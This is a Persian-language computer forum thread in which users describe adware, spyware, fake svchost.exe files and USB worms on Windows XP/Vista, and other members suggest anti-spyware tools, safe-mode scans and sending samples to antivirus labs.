[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

يك علامت تعجب داخل مثلث زرد هم مياد كه هي چشمك ميزنه و يك بالن هم داره

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Kaspersky هم يه چيزي به نام imsmain.exe پيدا مي كنه.

لطفاً بفرماييد كه اينا چي هستند و چي كارشون بايد بكنم؟

خيلي متشكرم :11:

شما با يك بد افزار طرف هستيد
سعي كنيد تولبار را پاك كنيد(كه صد در صد نميشود)
كاسپر بايد از بين ببرد.آپديت هست؟

سلام دوستان
وقتی فایلهای ویروسی در سی دی باشه چه جوری میشه پاکسازی شون کرد؟
حتمت نمیشه پاکشون کرد ولی خیلی وقت ها باعث ویروسی شدن سیستم میشدن!!
پس چه کار کنم؟

خیر ویروس نیست اما سیستم شما به Adware و Spyware آلوده شده. این 2 برنامه پایین رو که بهتون معرفی میکنم

دانلود کنید و سیستمتون رو هم باهاشون Full Scan کنید. البته یادتون نره اول باید این برنامه ها رو آپدیت کنید و بعد اسکن

رو شروع کنید.

1. Super Anti Spyware

2. AVG Anti Spyware

هر دوی این برنامه ها در همین انجمن معرفی شدند و لینکک دانلودشون وجود داره . اگر بگردید حتما پیدا میکنید.

سلام Persian.Boy عزيز،

با تشكر از راهنماييتون،

اولاً آيا با وجود كاسپر اينها لازمند؟

ثانياً آيا بودنشون در كنار كاسپر تداخل و conflict ايجاد نمي كنه؟

ثالثاً هر دو رو بايد نصب كنم يا يكيشون هم كافيه؟

با تشكر از عنايتتون

سلام دوستان
وقتی فایلهای ویروسی در سی دی باشه چه جوری میشه پاکسازی شون کرد؟
حتمت نمیشه پاکشون کرد ولی خیلی وقت ها باعث ویروسی شدن سیستم میشدن!!
پس چه کار کنم؟
سلام......... سیدی ها Read Only هستن و شما نمیتونید اونو پاک سازی کنید! :)

:)

سلام Persian.Boy عزيز،

با تشكر از راهنماييتون،

اولاً آيا با وجود كاسپر اينها لازمند؟

ثانياً آيا بودنشون در كنار كاسپر تداخل و conflict ايجاد نمي كنه؟

ثالثاً هر دو رو بايد نصب كنم يا يكيشون هم كافيه؟

با تشكر از عنايتتون

سلام امیر جان.

کسپرسکی یک آنتی ویروس است و انتظلر زیادی رو در از بین بردن Spyware ها و Adware ها نباید نه از این آنتی ویروس

و نه از آنتی ویروسهای دیگه داشت. هر چند که خود کسپرسکی و بعضی از آنتی ویروسهای دیگه مانند NOD32 و یا

Bitdefender قابلیت تشخیص سپای ویر ها رو نیز دارند اما نباید این نکته رو فراموش کنیم که کار اصلی یک

آنتی ویروس شناسایی و از بین بردن Virus,Trojan و Worm ها است و در شناسایی سپای ویر ها نمیتونه بصورت


تخصصی عمل کنه.

به نظر من شما هر دو برنامه رو دانلود کنید و از هر دوتاش در کنار همدیگه استفاده کنید. چون هر کدوم از اینا یک

چیزایی رو تشخیص میدن و یک چیزایی رو هم نمیتونن شناسایی کنند. زمانی که این دوتا برنامه رو که بهتون معرفی

کردم نصب کردید سعی کنید هر دوتاش رو بصورت غیر فعال نصب کنید. یعنی طوری باشه که همراه با ویندوز اجرا

نشند.

نصب این دو برنامه Anti Spyware نه تنها در کنار آنتی ویروسی مانند کسپرسکی اختلالی ایجاد نمیکنه بلکه نصب

آنها در کنار هر آنتی ویروسی جزو مسائل امنیتی حساب میشه و ضروری است. تا جایی که من خبر دارم تنها

آنتی ویروسی که کمتر برنامه های دیگه رو در کنار خودش تحمل میکنه BitDefender است.

اگر سوال دیگه ای در این مورد دارید میتونید بپرسید و یا چیزی که فکر میکنید توضیح ندادم.

موفق باشید.

امین جان
تا اونقدر که میدونم
مثلا درمانی نداره؟با قرنطینه کردن ویروس؟

سلام بر استاد پاتولوژي رايانه! (كه متاسفانه اسم شريفتون رو نمي‌دونم)

Perfect

واقعاً عالي و كامل. سپاس فراوان از توضيحات مبسوط و ارزنده شما.

بزرگواري فرموديد. اگر موردي بود بازم مزاحم ميشم.

با تقديم احترامات فائقه
:11:

به نظر من اگه با spyware doctor 5 چك كني بهتره.واقعا قويه.
در ضمن من bitdefender 10 رو دارم مشكلي با اسپاي وار دكتر نداره.

با سلام
من یک مشکلی دارم که اعصابمو خورده کرد میخواستم. من مبتدی رو کمک کنید
تو مسیرC:\Windows یک چیزی با این نام svchost.exeوجود داره که تمامی انتی ویروسها اینو شناسایی وپاکش میکنن ولی به محض اینکه یک برنامه رو اجرا یا نصب میکنم سریع برمیگرده ..تازه بعد از اینکه دستکاریش میکنم این پیغامو میده:Genric Host Procses For Win32 Servises این ویروس یا تروجان یا هیچ کدوم من باید با این چیکار کنم .الان ویندوز ویستا نصب کردم فکر کردم دیگه تو ویستا نمیاد ولی تو ویستا هم هست و وقتی پاکش میکنم هیچ برنامه ای اجرا نمیشه وقتی که یک برنامه رو با ادمینستراتور اجرا میشه وباز اون لعنتی برمیگرده سر جاش ایا میشه اینو جوری پاک کرد که دیگه برنگرده..اگه میشه منو راهنمایی کنید.

دوات پیش خودمه :10:

3 تا چیز لازم داری:

1- یک برنامه Prosses Manager و Startup Manager. من TweakNow PowerPack رو پیشنهاد می کنم.
2- این برنامه
3- یک ویروس کش قوی. که من Zone Alarm رو پیشنهاد می کنم

مراحل کار:

اگر این کار ها رو تو safe mode و بعد در حالت معمولی انجام بدی بهتره

1- با اون برنامه Prosses Manager و Startup Manager باید ابتدا هر برنامه ای که از Documents and settings اجرا می شه رو تعطیل کنی و بعد همه ی Startup هایی که تو اونها اسم "brontok" یا همین چیز ها یا "*.pif" یا فیلی بود که بدون محل اجرا بود حذف کنی
(سختش همین بود)
2- با این برنامه ای که لینک کردم همه چیز رو چک کنی (البته لازم نیست همه ی درایو ها رو انتخاب کنی)
3- با ویروس کش یک اسکن کامل می کنی


نتیجه:

دیگه هیچ Brontokی تو کامپیوترت نیست :11:
خیلی خیلی ممنون واقعا مفید بود
نجاتم دادی:46:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
یه سرچ بکن عزیز

سلام
به نظر من سیستم شما به ویروس Win32.jefoo.A آلوده شده!

این ویروس چسبیده به سرویسهای ویندوز شما(احتمالا)
شما یک اشتباه کردید و اون اینکه : قبل از پاک کردن ویروس نمی بایست ویندوز دیگه ای نصب کنید کنارش.در هر صورت عیبی نداره چون نمیدونستید.

حالا به حالت Safe Mode ویندوز برید و با آنتی ویروس کل هارد را اسکن و از ویروس پاکسازی کنید.بعد به حالت Normal برگردید .آنتی ویروس را روی High Security بگذارید و مجددا اسکن کنید تا مطمئن شوید هیچ اثری از ویروس باقی نمونده.

قبل از انجام کارهای بالا از آپدیت بودن آنتی ویروس خود اطمینان حاصل کنید.

با سلام
من یک مشکلی دارم که اعصابمو خورده کرد میخواستم. من مبتدی رو کمک کنید
تو مسیرC:\Windows یک چیزی با این نام svchost.exeوجود داره که تمامی انتی ویروسها اینو شناسایی وپاکش میکنن ولی به محض اینکه یک برنامه رو اجرا یا نصب میکنم سریع برمیگرده ..تازه بعد از اینکه دستکاریش میکنم این پیغامو میده:Genric Host Procses For Win32 Servises این ویروس یا تروجان یا هیچ کدوم من باید با این چیکار کنم .الان ویندوز ویستا نصب کردم فکر کردم دیگه تو ویستا نمیاد ولی تو ویستا هم هست و وقتی پاکش میکنم هیچ برنامه ای اجرا نمیشه وقتی که یک برنامه رو با ادمینستراتور اجرا میشه وباز اون لعنتی برمیگرده سر جاش ایا میشه اینو جوری پاک کرد که دیگه برنگرده..اگه میشه منو راهنمایی کنید.

دوست عزیز

شما باید مشکلتان را در تاپیک اختصاصی آن مطرح کنید .در مورد مشکلتان هم باید بگویم svchost.exe از پروسه های

حیاتی ویندوز به شمار می رود .مسیر واقعی آن Windows\System32 می باشد .بعضی از ویروسها فایلی با همین نام

را معمولا در پوشه ویندوز ( ولی نه در System32 ) ایجاد می کنند .الته بعضی نیز کدهای خود را به داخل svchost.exe

تزریق می کنند که حساب این گونه موارد جدا است .این یعنی این که هر svchost.exe که در Task Manager می بینی

ویروس نیست و اگر از ویستا استفاده می کنی و User Account Control را غیر فعال نکرده باشی من با اطمینان

می توانم بگویم هیچ کدام از آنها ویروس نیستند ولی برای اطمینان بیشتر با یک ضد ویروس قوی سیستمت را

اسکن کن اگر چیزی پیدا نکرد خیالت راحت باشد.

با سلام خدمت تمامی دوستان
مشکلی که من دارم این است که پهنای باند زیادی از اینترنت من صرف دانلود چیز ناشناخته ای میشود و درحالیکه دارم 10 کی دانلود میکنم فقط 2 کی به فایلم اضافه می شود کسپر - نود32 - مک افی - سوپر آنتی اسپای ور را هم دارم و همگی آپگرید هستند.
اگر میشود راهنماییم کنید با تشکر.

سلام دوستان
به من در از بين بردن يه جونور كثيف كمك كنيد!!:21:
عرضم به حضورتون اين ويروس يا ... پدر من رو در آورده چند تا كار انجام ميده :41::
از كار انداختن سيستم مديريت شبكه:18: كه دو تا فايل yreghpl.exe و vbegdwp.exe.هستند چون به از كار انداختن اينا در Task manger مديريت شبكه فعال ميشه ولي بعد از چند ثانيه دوباره مياد روي processes
از كار انداختن آنتي ويروس كه ناد آخرين ورژنش با آپديت باشه:2:!!
تكثر فوق العاده سريع از طريق شبكه داخليlan
باز نكردن درايو هاي هارد به طوري كه مجبور به فرمت كردن همه شدم!!!!! ولي بازم دوباره همين طور هست:wac:

خواهش مي كنم كمك كنيد:45:
فقط هر چه سريعتر بهتر چون ديگه دارم ديوونه ميشم:thumbsdow

يعني كسي نمي دونه كه اين چيه ؟؟؟
تو رو خدا كمك كنييييييد!!!!

سلام دوستان
به من در از بين بردن يه جونور كثيف كمك كنيد!!:21:
عرضم به حضورتون اين ويروس يا ... پدر من رو در آورده چند تا كار انجام ميده :41::
از كار انداختن سيستم مديريت شبكه:18: كه دو تا فايل yreghpl.exe و vbegdwp.exe.هستند چون به از كار انداختن اينا در Task manger مديريت شبكه فعال ميشه ولي بعد از چند ثانيه دوباره مياد روي processes
از كار انداختن آنتي ويروس كه ناد آخرين ورژنش با آپديت باشه:2:!!
تكثر فوق العاده سريع از طريق شبكه داخليlan
باز نكردن درايو هاي هارد به طوري كه مجبور به فرمت كردن همه شدم!!!!! ولي بازم دوباره همين طور هست:wac:

خواهش مي كنم كمك كنيد:45:
فقط هر چه سريعتر بهتر چون ديگه دارم ديوونه ميشم:thumbsdow

سلام دوست من

فکر می کنم یک ویروس جدید است شما فایل زیر را با حجم 208 کیلوبایت داونلود و اجرا کنید.در صفحه اول گزینه

Do a system scan and save a logfile را انتخاب و گزارش اسکن رابه طور کامل اینجا Copy&Past کنید:

HijacThis ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

اگر اجازه اجرای این برنامه را نداد نام آن را تغییر دهید و دوباره امتحان کنید باز اگر اجرا نشد در حالت Safe Mode

امتحان کنید ولی اگر باز هم نشد بگویید تا شاید راه دیگری پیدا کنیم.

يعني كسي نمي دونه كه اين چيه ؟؟؟
تو رو خدا كمك كنييييييد!!!!

دوست عزیز همانطور که VTN جان گفتند این یک ویروس جدیده و متاسفانه هنوز آنتی ویروس ها قادر به شناسایی

اون نیستند. تا جایی که من میدونم آنتی ویروسهای Avast Pro, Bitdefender, NOD32,Kaspersky,AVG و Panda

هنوز نمیتونند این فایل آلوده رو شناسایی کنند.

به نظر من شما دنبال فایل این 2 تا پروسه ای که نام بردید بگردید و اونا رو به صورت RAR در یک فایل قرار دهید. حال

وارد یکی از اکانت های خود در ایمیل یاهو شوید چون Gmail از فرستادن فایل هایی با پسوند exe جلوگیری میکنه.

حالا اون فایل فشرده شده رو همراه با جمله زیر و یا هر چی دوست داشتید به لابراتوار کسپرسکی بفرستید.

Infected! New virus

آدرس ایمیل کسپرسکی ...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

مطمئن باشید در کمتر از 2 یا 3 روز بهتون حتما جواب میدن و به احتمال خیلی زیاد اگر این فایل ها آلوده تشخیص داده

بشند کسپرسکی زود اونو بعنوان ویروس شناخته شده در اولین آپدیت خودش قرار میده.

در ضمن اگر براتون ممکن بود زحمت بکشید و اون دو تا پروسه رو که نام بردید بصورت فایل فشرده شده زیپ و یا

Rar شده در جایی آپلود کنید و اینجا قرار بدید. چون من هم میخوام اونو برای چند آنتی ویروس بفرستم. اما تا جایی

که گفتم کسپرسکی ساپورت قوی تری رو نسبت به آنتی ویروسهای دیگه داره و سریعتر جواب میده.

در ضمن این پست زیر را هم حتما بخونید شاید نتیجه گرفتید.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دوست عزیز همانطور که VTN جان گفتند این یک ویروس جدیده و متاسفانه هنوز آنتی ویروس ها قادر به شناسایی

اون نیستند. تا جایی که من میدونم آنتی ویروسهای Avast Pro, Bitdefender, NOD32,Kaspersky,AVG و Panda

هنوز نمیتونند این فایل آلوده رو شناسایی کنند.

به نظر من شما دنبال فایل این 2 تا پروسه ای که نام بردید بگردید و اونا رو به صورت RAR در یک فایل قرار دهید. حال

وارد یکی از اکانت های خود در ایمیل یاهو شوید چون Gmail از فرستادن فایل هایی با پسوند exe جلوگیری میکنه.

حالا اون فایل فشرده شده رو همراه با جمله زیر و یا هر چی دوست داشتید به لابراتوار کسپرسکی بفرستید.

Infected! New virus

آدرس ایمیل کسپرسکی ...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

مطمئن باشید در کمتر از 2 یا 3 روز بهتون حتما جواب میدن و به احتمال خیلی زیاد اگر این فایل ها آلوده تشخیص داده

بشند کسپرسکی زود اونو بعنوان ویروس شناخته شده در اولین آپدیت خودش قرار میده.

در ضمن اگر براتون ممکن بود زحمت بکشید و اون دو تا پروسه رو که نام بردید بصورت فایل فشرده شده زیپ و یا

Rar شده در جایی آپلود کنید و اینجا قرار بدید. چون من هم میخوام اونو برای چند آنتی ویروس بفرستم. اما تا جایی

که گفتم کسپرسکی ساپورت قوی تری رو نسبت به آنتی ویروسهای دیگه داره و سریعتر جواب میده.

در ضمن این پست زیر را هم حتما بخونید شاید نتیجه گرفتید.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


ممنونم دوست عزيز ولي مشكل اينه كه اين فايل دراينجا ها هست:
C:\Program Files\Common Files\Microsoft Shared\yreghpl.exe
C:\Program Files\Common Files\System\vbegdwp.exe
C:\Documents and Settings\Subzero\Desktop\hijackthis\HJT2.exe

ولي اصلا وارد نميشه يعني پنجره رو مي بنده:41:

من يه صفحه واسه اين پيدا كردم فقط يك صفحه در اينترنت!!!:18:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
ببينين به درد مي خوره من كه زياد نفهميدم ولي اينو مطمئنم كه از IE7 نفوذ مي كنه :21:
حواستون باشه من كه مجبور شدم كل كامپيوتر هاي شبكه رو تا اين ساعت كه 3:30 صبح باشه :41: ويندوز عوض كنم ولي مشكل درايو ها پابرجاست درايوهارو فرمت كردم آنتي ويروسم كاسپر7 آپديت كردم يه فايل به اسمWin nt32 فكر كنم بود كه پيدا كرد و پاك كرد فعلا كه مشكلي ندارم تا ببينيم چي ميشه!!!!:20:



ولي واقعا بدترين ويروسي بود كه من در عمرم ديدم!!!!!!!:2:

با سلام خدمت تمامی دوستان
مشکلی که من دارم این است که پهنای باند زیادی از اینترنت من صرف دانلود چیز ناشناخته ای میشود و درحالیکه دارم 10 کی دانلود میکنم فقط 2 کی به فایلم اضافه می شود کسپر - نود32 - مک افی - سوپر آنتی اسپای ور را هم دارم و همگی آپگرید هستند.
اگر میشود راهنماییم کنید با تشکر.

از اساتید محترم اگر کسی وقت داره یه کمکی هم به ما بکنه !

lopez
جان پس با این وجود فعلا مشکلتون رو توسط کسپرسکی حل کردید.

در اون سایتی هم که اشاره نمودید یکی از نکته های مهمی که بهش اشاره شده بود این بود که این ویروس بعد از

فرمت و ویندوز جدید سریع دوباره فعال میشه. یعنی با فرمت از بین نمیره.

سلام به همه

دوستان سیستمم دچار یک Spy شده که نه اسمش رو میدونم و نه هیچی فقط چند مورد عکس از اتفاقات افتاده و پیغامهایی که میده میزارم لطفا راهنمایی کنید Thx .

اون پایین کنار ساعت ایکونی که عکس رو میزارم یه صورت چشمک زن همواره میاد

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

و این پیغام رو هم میده

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


و وقتی روش کلیک میکنم وارد این سایت میشه

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


قبلا هم یه همچین نمونه ای گرفته بودم اما از بین بردم اما این نمیشه

lopez
جان پس با این وجود فعلا مشکلتون رو توسط کسپرسکی حل کردید.

در اون سایتی هم که اشاره نمودید یکی از نکته های مهمی که بهش اشاره شده بود این بود که این ویروس بعد از

فرمت و ویندوز جدید سریع دوباره فعال میشه. یعنی با فرمت از بین نمیره.

نه واقعا كه بد پيله هست من كه مجبور شدم يك شب تا صبح رو پاي سيستم هاي شبكه با دوستم سر كنم فقط كافيه روي درايو ويندوز كليك يا باز كنيد سريعا فعال و در شبكه پخش ميشه :18: بايد بعد از نصب ويندوز سريعا فقط و فقط آنتي ويروس نصب و هارد رو اسكن كنين و بعدش اطلاعاتتون رو در جايي ديگه ريخته (مثل من كه مجبور به خريدن هارد و ريختن اطلاعاتم كه بسيار مهم بودن در هارد دوم) البته به غير از درايو ويندوز و بقيه درايو ها رو فرمت كنين تا فرمت هم نكنين درست نميشه :21:
در مورد اون كه گفته بودي با كاسپر نميدونم مال اون بود يا نه ولي من در سايت كاسپر هم چيزي واسه اين گير نياوردم :41:

فقط كافيه يك فلش آلوده باشه و به سيستم وصل كنين تمومه 1 ثانيه بعد سيستم مريض ميشه :2:

انشااله كه واسه هيشكي پيش نياد چون من اصلا خاطره خوشي ازش ندارم (شب تا صبح سيستم ها رو درست مي كردم:41:)ولي اين رو مي دونم كه كسايي كه IE7 دارن بايد بيشتر مراقب باشن :46:

سلام به همه

دوستان سیستمم دچار یک Spy شده که نه اسمش رو میدونم و نه هیچی فقط چند مورد عکس از اتفاقات افتاده و پیغامهایی که میده میزارم لطفا راهنمایی کنید Thx .

اون پایین کنار ساعت ایکونی که عکس رو میزارم یه صورت چشمک زن همواره میاد

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

و این پیغام رو هم میده

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


و وقتی روش کلیک میکنم وارد این سایت میشه

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


قبلا هم یه همچین نمونه ای گرفته بودم اما از بین بردم اما این نمیشه

سلام دوست من

این سیستم دچار یک Adware شده است که پیغامهای امنیتی کاذب به شما می دهد و شما را تشویق می کند تا ا

این برنامه را داونلود ونصب کنید .علت به وجود آمدن این مشکل هم عدم وجود یک آنتی اسپایور درست و حسابی

روی سیستم است .در هر حالت شما می توانید دو کار بکنید :یا سوپر آنتی اسپایور یا AVG را داونلود و نصب کرده و

پس از آپدیت سیستمتان را با آنها اسکن کنید تا شما را از شر این مشکل خلاص کنند یا برنامه مخصوص این اسپایور

را نصب و اجرا کنید .راه اول یعنی نصب آنتی اسپایور بهتر است چون بعد از این هم به دردتان می خورد ولی اگر راه

دوم را خواستید بگویید تا لینک و طرز کار برنامه اختصاصی را برایتان بنویسم.

سلام دوست من

این سیستم دچار یک Adware شده است که پیغامهای امنیتی کاذب به شما می دهد و شما را تشویق می کند تا ا

این برنامه را داونلود ونصب کنید .علت به وجود آمدن این مشکل هم عدم وجود یک آنتی اسپایور درست و حسابی

روی سیستم است .در هر حالت شما می توانید دو کار بکنید :یا سوپر آنتی اسپایور یا AVG را داونلود و نصب کرده و

پس از آپدیت سیستمتان را با آنها اسکن کنید تا شما را از شر این مشکل خلاص کنند یا برنامه مخصوص این اسپایور

را نصب و اجرا کنید .راه اول یعنی نصب آنتی اسپایور بهتر است چون بعد از این هم به دردتان می خورد ولی اگر راه

دوم را خواستید بگویید تا لینک و طرز کار برنامه اختصاصی را برایتان بنویسم.

سلام بر شما

لطف مي‌كنيد راه دوم رو توضيح بديد. مال من هم دقيقاً همين مشكل رو داره.

ضمناً ممكنه لينك داونلود آنتي اسپاي وري كه خود شما استفاده مي كنيد (به همراه كرك لطفاً) رو بگذاريد.

خيلي خيلي ممنونم

با تقديم احترامات :11:

سلام منم الان با این مشکل روبرو شدم سرچ کردم این تاپیک پیدا شد میشه دوباره این فایلو آپلود کنید؟

سلام منم الان با این مشکل روبرو شدم سرچ کردم این تاپیک پیدا شد میشه دوباره این فایلو آپلود کنید؟


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام به همه دوستان
روي كامپيوتر من يه ويروس افتاده كه وقتي كه در my computer روي درايوها دابل كليك مي كنم
آنها را باز نمي كند و بايد راست كليك و open به داخل رايو بروم و error key Logger
مي دهد.ويندوز را عوض و كاسپر رو هم نصب و آپ ديت كردم ولي ويروس پيدا نكرد ولي در موقع اسكن كردن دايو سيستم عامل بعضي از فايلها را به علت قفل بودن Locked نمي توانست باز كند .
كاسپر هم خطاي key Logger مي دهد .
با تشكر

سلام بر شما

لطف مي‌كنيد راه دوم رو توضيح بديد. مال من هم دقيقاً همين مشكل رو داره.

ضمناً ممكنه لينك داونلود آنتي اسپاي وري كه خود شما استفاده مي كنيد (به همراه كرك لطفاً) رو بگذاريد.

خيلي خيلي ممنونم

با تقديم احترامات :11:

دوست عزیز

راه اول بهتر است چون علاوه بر این اسپایور , دیگر آلودگیهای موجود روی سیستم شما را هم پاک می کند .من در حال

حاظر از نسخه Starter اسپایور دکتر استفاده می کنم ( چون با وجود کاسپرسکی به Real Time Protection آن نیاز ندارم

فقط آن را طوری تنظیم کرده ام که هر روز یک اسکن سریع انجام می دهد .در واقع با وجود کاسپرسکی تا به حال نه این

آنتی اسپایور و نه دیگر آنتی اسپایورهایی که استفاده کرده ام چیزی بیشتر از چند کوکی بی ضرر پیدا نکرده اند )

ولی متاسفانه با آنکه از آن راضی هستم با یکی از نرم افزارهای موجود روی سیستم ناسزگار می باشد و در حال

حاظر دنبال یک جایگزین مناسب می گردم .در مورد این آلودگی هم باید بگویم انواع زیادی از اسپایورها ( که معمولا

به آنها Rogue Anti-Spyware نیز اطلاق می شود ) باعث این نوع آلودگی می شوند .در مورد این دوست عزیز این

آلودگی ناشی از Virus protect pro می باشد ولی ممکن است در مورد شما مشکل از یک گونه دیگر باشد .هرچند

که روش دوم در مورد اکثر این آلودگیها موثر است من همچنان راه اول را پیشنهاد می کنم ولی محض اطلاع شما و

دوستان دیگر روش دوم یا اختصاصی پاک کردن این گونه آلودگیها را شرح می دهم :

برنامه زیر را داونلود کنید ( حجم=866 کیلوبایت ) :

SmitfraudFix ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

و آن را روی هارد Save کنید .حالا به حالت Safe Mode بروید و برنامه را اجرا کنید .صفحه اولی که بالا می آید

اهمیتی ندارد و با زدن Enter آن را رد کنید تا به صفحه زیر برسید :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

حالا گزینه شماره دو یعنی Clean را با زدن شماره 2 انتخاب کرده و دوباره Enter بزنید برنامه شروع به اسکن کند

پس از پایان اسکن پیامی به صورت Do you want to clean the registry ? y/n ظاهر می شود که شما باید دکمه Y

را به عنوان موافقت فشار دهید و بعد دوباره Enter بزنید .پس از پایان تمام این کارها پیغام

Computer will reboot now. Close all applications

ظاهر می شود که شما Space Bar را روی کیبورد فشار می دهید و اجازه می دهید تا سیستم ریستارت شود.حالا

سیستم شما از شر این آلودگی پاک شده است و پس از بالا آمدن ویندوز یک گزارش مبنی بر پاک شدن آلودگی

دریافت خواهید کرد .

البته لازم به یاداوری است که ممکن است بعضی از آنتی ویروسها به این برنامه که داونلود کرده اید گیر بدهند ولی

مطمئن باشید برای سیستمتان خطری ندارد و پس از پاک کردن آلودگی می توانید به سادگی آن را پاک کنید .

سلام vtn54 عزيز،

نمي‌دونم چه‌طور از شما تشكر كنم.

من Spyware Doctor 4 با آپديت كامل رو دارم ولي نتونست كاري بكنه. (خاك تو گورش!!)

ولي اين چيزي كه شما داديد، همچين يه حال اساسي به اين اسپايوره داد كه طرف كامل بساطش رو جمع و جور كرد رفت پي كارش. واقعاً ممنون

خداوند شما و ساير دوستان اين بخش رو براي ما حفظ كنه.

ارادتمندم :11:

سلام دوست من

این سیستم دچار یک Adware شده است که پیغامهای امنیتی کاذب به شما می دهد و شما را تشویق می کند تا ا

این برنامه را داونلود ونصب کنید .علت به وجود آمدن این مشکل هم عدم وجود یک آنتی اسپایور درست و حسابی

روی سیستم است .در هر حالت شما می توانید دو کار بکنید :یا سوپر آنتی اسپایور یا AVG را داونلود و نصب کرده و

پس از آپدیت سیستمتان را با آنها اسکن کنید تا شما را از شر این مشکل خلاص کنند یا برنامه مخصوص این اسپایور

را نصب و اجرا کنید .راه اول یعنی نصب آنتی اسپایور بهتر است چون بعد از این هم به دردتان می خورد ولی اگر راه

دوم را خواستید بگویید تا لینک و طرز کار برنامه اختصاصی را برایتان بنویسم.

ممنون دوست من
از همان راه اول حل شد :11:

سلام
گیر یه موجود زبون نفهم افتادم که حالم رو گرفته کلی اطلاعات رو نمیدونم hidden کردن اصلا تو درایوها نیست ولی موقع اسکن آنتی ویروس اونا رو اسکن میکنه یعنی همون فایلهایی که نیستن رو آنتی ویروس نشون میده که داره اسکن میکنه ولی تو خود درایو ها نیست تو exe کردن هم که کارش 20 My Documents منو تبدیل به exe کرده بود
ممنون میشم کمک کنید

آقا این ویروسی که نمیذاره فایلهای مخفی نمایش داده بشه رو چه جور میشه از بین برد
هرکار میکنی بازم تنظیمات فایلهای مخفی رو روی donot show hiddden ... قرار میده

سلام
گیر یه موجود زبون نفهم افتادم که حالم رو گرفته کلی اطلاعات رو نمیدونم hidden کردن اصلا تو درایوها نیست ولی موقع اسکن آنتی ویروس اونا رو اسکن میکنه یعنی همون فایلهایی که نیستن رو آنتی ویروس نشون میده که داره اسکن میکنه ولی تو خود درایو ها نیست تو exe کردن هم که کارش 20 My Documents منو تبدیل به exe کرده بود
ممنون میشم کمک کنید

سلام

سری به تاپیک زیر بزنید:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

آقا این ویروسی که نمیذاره فایلهای مخفی نمایش داده بشه رو چه جور میشه از بین برد
هرکار میکنی بازم تنظیمات فایلهای مخفی رو روی donot show hiddden ... قرار میده

دوست عزیز

برای مشکلات مربوط به ویروسها تاپیک مخصوص وجود دارد و نباید به خاطر هر مشکلی یک تاپیک جدید ایجاد کنید .برای

مشکلتان سری به تاپیک زیر بزنید :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

vtn جان ازت ممنونم مشکل حل شد حالم رو گرفته بود

سلام
آقا بعد از یه هارد به هاردی که من کردم کامپیوترم یه جورایی شده مثلا وقتی رو درایوهام دابل کلیک میکنم یه پنجره جداگانه واسه اون درایو باز میشه مثل حالت عادی مستقیم وارد درایو نمیشه و وقتی هم که ویندوزم بالا میکشه یه ارور از temp 2.exe میده با عوض کردن ویندوز هم مشکلم حل نشد یکی کمکم کنه
ممنونم

سلام
آقا بعد از یه هارد به هاردی که من کردم کامپیوترم یه جورایی شده مثلا وقتی رو درایوهام دابل کلیک میکنم یه پنجره جداگانه واسه اون درایو باز میشه مثل حالت عادی مستقیم وارد درایو نمیشه و وقتی هم که ویندوزم بالا میکشه یه ارور از temp 2.exe میده با عوض کردن ویندوز هم مشکلم حل نشد یکی کمکم کنه
ممنونم

فایل زیر را داونلود و اجرا کنید ( حجم=27 کیلوبایت ):

PRT ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

پس از اینکه آلودگی را پاک کرد یکبار دیگر سیستمتان را بایک آنتی ویروس درست و حسابی اسکن کنید.

این ویروسه FUN رو چجوری باید پاک کرد؟هرکاری می کنم پاک میشه ولی به محض اینکه رو یکی از درایو ها کلیک می کنم دوباره شروع میشه:41:
اینم جواب نمیده!

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
ناد32 هم نمی شناستش !آپدیت هم هست

با سلام
مي خواستم بدونم ويروسي كه نيو فولدر ها را پاك و يك فايل اجرايي يه همون نام درست مي كنه چيه و چطوري ميشه پاكش كرد
آيا خود نيوفولدر ها رو به فايل اجرايي تبديل مي كنه يا نيوفولدر را پاك كرده و يك فايل اجرايي با همون شكل و اسم درست مي كنه
آيا راهي براي پاك كردن اين ويروس هست

با سلام
مي خواستم بدونم ويروسي كه نيو فولدر ها را پاك و يك فايل اجرايي يه همون نام درست مي كنه چيه و چطوري ميشه پاكش كرد
آيا خود نيوفولدر ها رو به فايل اجرايي تبديل مي كنه يا نيوفولدر را پاك كرده و يك فايل اجرايي با همون شكل و اسم درست مي كنه
آيا راهي براي پاك كردن اين ويروس هست

سلام دوست عزیز

لطفا بعد از این قبل از ایجاد تاپیک برای سوالاتتان ابتدا جستجویی در انجمن بکنید ( حداقل در قسمت تاپیکهای مهم ) چون

اغلب سوالات شما قبلا توسط دوستان دیگر پرسیده شده و دوستان دیگر پاسخ داده اند برای جواب سوالتان هم سری به

لینک زیر بزنید :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

